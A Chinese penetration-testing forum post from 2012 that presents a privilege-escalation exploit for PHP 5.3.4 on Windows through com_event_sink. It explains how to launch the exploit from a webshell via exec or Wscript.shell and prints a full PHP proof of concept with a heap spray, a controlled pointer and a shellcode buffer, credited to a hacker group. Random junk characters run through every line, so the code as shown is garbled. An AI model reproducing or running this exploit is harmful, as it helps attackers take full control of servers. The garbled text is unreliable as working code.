中国网络渗透测试联盟

标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞 [打印本页]
作者: admin    时间: 2012-11-9 21:08
标题: PHP 5.3.4(WIN) COM_SINK权限提升漏洞
PHP最新版已经更新至5.4.x,不过中国大陆尚处于在5.2.x和5.3.x更替的阶段。存在漏洞的php存在于5.3.x版本中4 T3 l, a1 J" A9 ?7 r7 m" t
7 w7 B  Y* `/ }1 M' Z: Z
测试方法如下:cmd /c x:\php\php.exe x:\test.php/ x& u& B$ H1 Z: x% W

1 a, Z' e$ D5 I( f! v( e下载php程序至本地,然后使用php.exe解析php即可。Webshell上面使用php的exec等函数执行,或者使用Wscript.shell调用cmd.exe然后 /c x:\php\php.exe x:\xxxx\test.php
, c* y* _1 ~9 ^5 Y1 ^" o# Y% M这里是两个测试的截图:4 W' k+ T" D0 _+ z; ~
! L3 Z# z- Z* J4 P& l

6 D* ]9 z) T& C& S, ^* ?/ e% R$ Y
8 U0 S* p( j2 P4 A  r8 Q4 P  C1 o/ p& q* l3 m( C- I

* O7 ]; ^/ p9 v; P. @成功利用此漏洞的攻击者将获得系统的最高权限8 h0 W3 ?$ w# g2 a2 F  t
) I5 K1 l, U2 L- k' l" T3 K* T
- X9 H! G* P/ u6 }

. i/ E5 R0 u) w( T6 T* V2 k6 r/ J
1 v; H4 K9 v8 Y3 v
关于漏洞分析稍后附上。一下是PoC代码:
2 D" c' ~) X) D5 P3 y) J: z; ~* r! @+ V' l; t4 Q3 E0 m8 ?
<?php
) s0 c$ S# S) r; q! `/ N2 r//PHP 5.3.4(Win版) com_event_sink()模型权限提升漏洞/ Z4 J5 z0 X' V3 c
//$eip ="\x44\x43\x42\x41";, o* ?3 g" s8 i; f
$eip= "\x4b\xe8\x57\x78";" O1 g8 F1 J# C7 V$ Y1 R, B
$eax ="\x80\x01\x8d\x04";
3 f6 V) Z* F) g6 A$deodrant="";
( a+ F/ ^- W1 R1 w/ C) m$axespray = str_repeat($eip.$eax,0x80);
) O/ R' V; T9 e( y//048d0190, _2 v, T8 S, B) t% ?" l, A
echo strlen($axespray);
7 u) s  h. C' E8 s- N2 A3 necho "PHP 5.3.4(WIN) COM_SINK Privilege Escalation\n";6 l% I) K9 |9 L3 X" U7 x) q
echo "Silic Group Hacker Army - BlackBap.Org";+ _% `1 B5 O: m5 h- ]' Z% e
//19200 ==4B32 4b00
" `- J0 N) @$ w9 z+ w  g; ?- |for($axeeffect=0;$axeeffect<0x4B32;$axeeffect++){$deodrant.=$axespray;}8 k' G1 R' s% }1 ^& L  s
$terminate = "T";
% C+ h" c1 a! {$u[] =$deodrant;0 ]+ @; ]4 g( y3 c
$r[] =$deodrant.$terminate;& h9 E( h% q2 P
$a[] =$deodrant.$terminate;
% K7 ^; d3 t7 A2 q" s$s[] =$deodrant.$terminate;, v" G0 S1 p& [% Q1 L3 o) o# m1 m
//$vVar = new VARIANT(0x048d0038+$offset);        这里是可控可改的
. z& J! T! E  ~; D- P7 ^; g: f$vVar = new VARIANT(0x048d0000+180);8 Z9 Z) Q% L& a0 n+ j5 \* C" w( r
//弹窗代码(Shellcode)- V7 T; T, x, f# p. x  m& ~
$buffer = "\x90\x90\x90"."\xB9\x38\xDD\x82\x7C\x33\xC0\xBB"."\xD8\x0A\x86\x7C\x51\x50\xFF\xd3";5 U/ O  g6 A, R3 A1 ?
$var2 = new VARIANT(0x41414242);
0 w* G2 P2 d7 i0 z; v7 Bcom_event_sink($vVar,$var2,$buffer);8 a9 T2 u$ R1 n0 I6 A) S1 k% R
?>
' J: S& u* s4 p[attach]113[/attach][attach]114[/attach]



欢迎光临 中国网络渗透测试联盟 (https://cobjon.com/) Powered by Discuz! X3.2